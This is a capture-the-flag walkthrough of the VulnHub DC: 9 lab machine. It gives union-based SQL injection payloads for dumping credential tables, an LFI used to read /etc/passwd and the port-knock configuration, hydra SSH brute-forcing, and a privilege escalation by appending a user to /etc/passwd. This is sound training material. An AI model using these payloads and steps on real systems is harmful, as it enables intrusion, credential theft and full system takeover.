VulnHub: DC: 9

ratiros01
8 min readMay 15, 2021

--

Initial foothold

  1. Network discovery
nmap -sn 10.0.2.27/24

My target is 10.0.2.49.

2. Port scan

nmap -Pn 10.0.2.49nmap -Pn -p1000- 10.0.2.49

There’re 1 filtered port, 22 and 1 open port, 80.

3. OS and service scan

nmap -A -p22,80 10.0.2.49

There’s Apache httpd 2.4.38 on port 80.

4. Vuln scan

nmap --script vuln -p22,80 10.0.2.49

Nothing.

Service Enumeration

HTTP service

  1. Nikto scan
nikto -h http://10.0.2.49

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q

3. Access HTTP site

/index.php

/display.php

/search.php -> possible SQL injection

/manage.php -> possible SQL injection

It’s funny that when I accessed session.php and logout.php. I was redirected to manage.php and had admin session.

Conclusion:

There’re two possible SQLi vulnerabilities to test in search.php and manage.php

If you do a very good reconnaissance and discover that logout.php is redirected to manage.php w/ admin session. It will save a lot of time. However, I will demonstrate how to test for SQLi starting from search.php.

Exploitation

  1. Supply an input

2. Intercept w/ Burp Suite

3. Send to the intruder

At the right panel -> Clear $

Double click at “test” and click “add $” at the right panel

Set up the payload. This payload is based on my experience. I already uploaded it on Github.

Here’s my Github link.

Start the attack. Here’s the result. In this case, you will see the difference in length. Let’s check it out.

Test the payload. I will use:

' or 1=1--

Here’s the result.

4. Next is to test the union query to find columns

Change the value to be:

' union select 1--

Add $ on “1”

Load the payload

Here’s the GitHub link.

Start the attack, the column number is six.

Test the payload

' union select 1,2,3,4,5,6--

Succeeded!!!

5. Find the version, hostname, current database

' union select 1,@@version,@@hostname,database(),5,6--

Note it.

6. Get other databases

' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

I don't have any results.

Fix by change comment according from Intruder attack

I will change from:

-- to -- -

Here’s the new query:

' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -

Result.

Note it.

7. “Staff” schema

Get table name

' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -

Note it

Get columns

' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users'  and table_schema='Staff'-- -

Note it

Get data

' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -

Note it

Crack the hash w/ crackstation

8. “users” schema

Get tables

' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -

Get columns

' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails'  and table_schema='users'-- -

Get data

' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -

View page source

Copy, organize and save it as raw.txt

Extract only usernames and save as users.txt

cat raw.txt | cut -d ":" -f2 > users.txtcat users.txt

Extract only passwords and save as passwords.txt

cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txtcat passwords.txt

Conclusion:

This database has data structure like this:

Database -> Tables -> Columns

  • Staff -> StaffDetails, Users ->UserID, Username, Password

Data:

1:admin:856f5de590ef37314e7c3bdf6f8a66dc

Crack the hash -> transorbital1

  • users -> UsersDetails -> id,firstname,lastname,username,password,reg_date

Data is saved as raw.txt

9. Searching for expoit in manage.php

You will see the “File does note exist” string. I bet this is a hint about LFI.

View page source, nothing much.

I will find the parameter w/ wfuzz, but first I need to intercept the page request and copy the Cookie value.

Fuzz w/ wfuzz

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php

You will see that there’re much non-related strings and their length is 100.

Hide string w/ length value is 100. by supplying “--hw 100”.

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php

Nothing.

Change index.php to “../../../../../etc/passwd”

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwd

Now I got the result.

Test the parameter

Comparing w/ credential from raw.txt I may use these to login, but SSH is filtered. The possibility is there’s a port-knocking function.

The typical port-knocking configuration is located in:

/etc/knockd.conf

Supply in w/ LFI. There’s a result.

View page source for easier sequence identification.

10. Open filtered port by using the sequence result.

for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done

Test SSH connection, now I can connect the SSH service.

11. Brute-forcing for the credentials.

hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -u

I got 3 credentials.

Privilege Escalation

  1. I will start w/ janitor
ssh janitor@10.0.2.49password: Ilovepeepeels -la

Lucky me, I found a hidden directory.

cd .secrets-for-putinls -lacat passwords-found-on-post-it-notes.txt

Now I got another set of passwords.

Save it as janitor_password.txt

2. Another SSH brute-forcing.

hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u

Starting from “fredf”. Login to SSH service.

ssh fredf@10.0.2.49password: B4-Tru3-001sudo -l

I can run this binary.

Test the command

sudo /opt/devstuff/dist/test/test 

Test the usage

echo "Hello World" > for_readsudo /opt/devstuff/dist/test/test for_read for_appendls -la cat for_append

Next, I will append another user w/ password in /etc/passwd

Create password

openssl passwd -1 -salt new password123
nano strings_to_append

Add the data as shown in the screenshot.

Append /etc/passwd

sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd

Verify /etc/passwd

cat /etc/passwd

Now I got “newuser”.

Login as new user

su newuserpassword: password123cd /rootls -la

Now I got the flag.

cat theflag.txt

--

--

No responses yet